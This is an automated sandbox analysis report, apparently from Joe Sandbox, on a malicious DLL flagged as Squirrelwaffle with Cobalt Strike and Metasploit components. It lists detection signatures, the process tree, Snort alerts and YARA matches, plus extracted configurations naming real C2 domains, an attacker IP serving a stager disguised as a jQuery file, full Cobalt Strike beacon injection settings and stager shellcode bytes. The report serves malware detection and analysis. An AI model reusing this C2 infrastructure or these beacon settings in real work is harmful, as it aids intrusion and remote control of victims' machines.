Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report p2SijKiqgZ.dll

Overview

General Information

Sample Name:p2SijKiqgZ.dll
Analysis ID:491706
MD5:803768a34f7e59b8a9a2f3969624c47e
SHA1:09a38940ef023929897fdc9c996de0b0f39116e2
SHA256:2a0a88a2e5f9cafa10a48d63bdfcdf965b72c25978ab46cf28e795dbedc9624a
Tags:dllSquirrelwaffle
Infos:

Most interesting Screenshot:

Detection

CobaltStrike Metasploit Squirrelwaffle
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Squirrelwaffle
Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Yara signature match
One or more processes crash
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Adds / modifies Windows certificates
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6620 cmdline: loaddll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6644 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6688 cmdline: rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Squirrelwaffle

{"C2 urls": ["acdlimited.com/2u6aW9Pfe", "jornaldasoficinas.com/ZF8GKIGVDupL", "orldofjain.com/lMsTA7tSYpe", "altayaralsudani.net/SSUsPgb7PHgC", "hoteloaktree.com/QthLWsZsVgb", "aterwellnessinc.com/U7D0sswwp", "sirifinco.com/Urbhq9wO50j", "ordpress17.com/5WG6Z62sKWo", "mohsinkhanfoundation.com/pcQLeLMbur", "lendbiz.vn/xj3BhHtMbf", "geosever.rs/ObHP1CHt", "nuevainfotech.com/xCNyTjzkoe", "dadabhoy.pk/m6rQE94U", "111", "sjgrand.lk/zvMYuQqEZj", "erogholding.com/GFM1QcCFk", "armordetailing.rs/lgfrZb4Re6WO", "lefrenchwineclub.com/eRUGdDox"]}

Threatname: Metasploit

{"Headers": "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://23.82.140.206/jquery-3.3.1.slim.min.js"}

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 8080, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "C2Server": "tuxsecuritybiness.com,/jquery-3.3.1.min.js,23.82.140.206,/jquery-3.3.1.min.js", "HttpPostUri": "/jquery-3.3.2.min.js", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmpCobaltbaltstrike_RAW_Payload_https_stager_x86Detects CobaltStrike payloadsAvast Threat Intel Team
  • 0x0:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmpCobaltbaltstrike_RAW_Payload_https_stager_x86Detects CobaltStrike payloadsAvast Threat Intel Team
    • 0x1bf90:$h01: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28
    00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000003.00000000.254857742.0000000004590000.00000040.00000001.sdmpJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.loaddll32.exe.2630000.2.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
          3.0.rundll32.exe.4590000.6.raw.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
            0.2.loaddll32.exe.2a70184.3.raw.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
              3.2.rundll32.exe.45a0000.3.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
                0.2.loaddll32.exe.9b0000.1.raw.unpackJoeSecurity_SquirrelwaffleYara detected SquirrelwaffleJoe Security
                  Click to see the 7 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmpMalware Configuration Extractor: Metasploit {"Headers": "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://23.82.140.206/jquery-3.3.1.slim.min.js"}
                  Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 8080, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "C2Server": "tuxsecuritybiness.com,/jquery-3.3.1.min.js,23.82.140.206,/jquery-3.3.1.min.js", "HttpPostUri": "/jquery-3.3.2.min.js", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
                  Source: 3.0.rundll32.exe.45a0000.7.unpackMalware Configuration Extractor: Squirrelwaffle {"C2 urls": ["acdlimited.com/2u6aW9Pfe", "jornaldasoficinas.com/ZF8GKIGVDupL", "orldofjain.com/lMsTA7tSYpe", "altayaralsudani.net/SSUsPgb7PHgC", "hoteloaktree.com/QthLWsZsVgb", "aterwellnessinc.com/U7D0sswwp", "sirifinco.com/Urbhq9wO50j", "ordpress17.com/5WG6Z62sKWo", "mohsinkhanfoundation.com/pcQLeLMbur", "lendbiz.vn/xj3BhHtMbf", "geosever.rs/ObHP1CHt", "nuevainfotech.com/xCNyTjzkoe", "dadabhoy.pk/m6rQE94U", "111", "sjgrand.lk/zvMYuQqEZj", "erogholding.com/GFM1QcCFk", "armordetailing.rs/lgfrZb4Re6WO", "lefrenchwineclub.com/eRUGdDox"]}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: p2SijKiqgZ.dllReversingLabs: Detection: 15%
                  Antivirus detection for URL or domainShow sources
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfwAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/Avira URL Cloud: Label: malware
                  Source: tuxsecuritybiness.comAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.comAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com/vAvira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com/Avira URL Cloud: Label: malware
                  Source: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVwAvira URL Cloud: Label: malware
                  Source: p2SijKiqgZ.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.259967612.0000000004F0D000.00000004.00000001.sdmp
                  Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb} source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcp140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb{ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdbt source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdbc source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: vcruntime140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdbe source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb# source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdbw source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdbi source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\Dll1\Release\Dll1.pdb source: loaddll32.exe, 00000000.00000002.518246060.0000000002A70000.00000040.00000001.sdmp, rundll32.exe
                  Source: Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: advapi32.pdb_ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netutils.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00968B24 FreeLibrary,UnregisterDeviceNotification,3_2_00968B24
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009452FC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_009452FC

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49751
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49751
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49754
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49754
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49756
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49756
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49762
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49762
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49764
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49764
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49765
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49765
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49768
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49768
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49770
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49770
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49772
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49772
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49774
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49774
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49776
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49776
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49777
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49777
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49778
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49778
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49780
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49780
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49781
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49781
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49783
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49783
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49785
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49785
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49787
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49787
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49789
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49789
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49790
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49790
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49792
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49792
                  Source: TrafficSnort IDS: 2018316 ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.7:58498
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49794
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49794
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49796
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49796
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49798
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49798
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49800
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49800
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49802
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49802
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49804
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49804
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49806
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49806
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49810
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49810
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49811
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49811
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49813
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49813
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49815
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49815
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49817
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49817
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49819
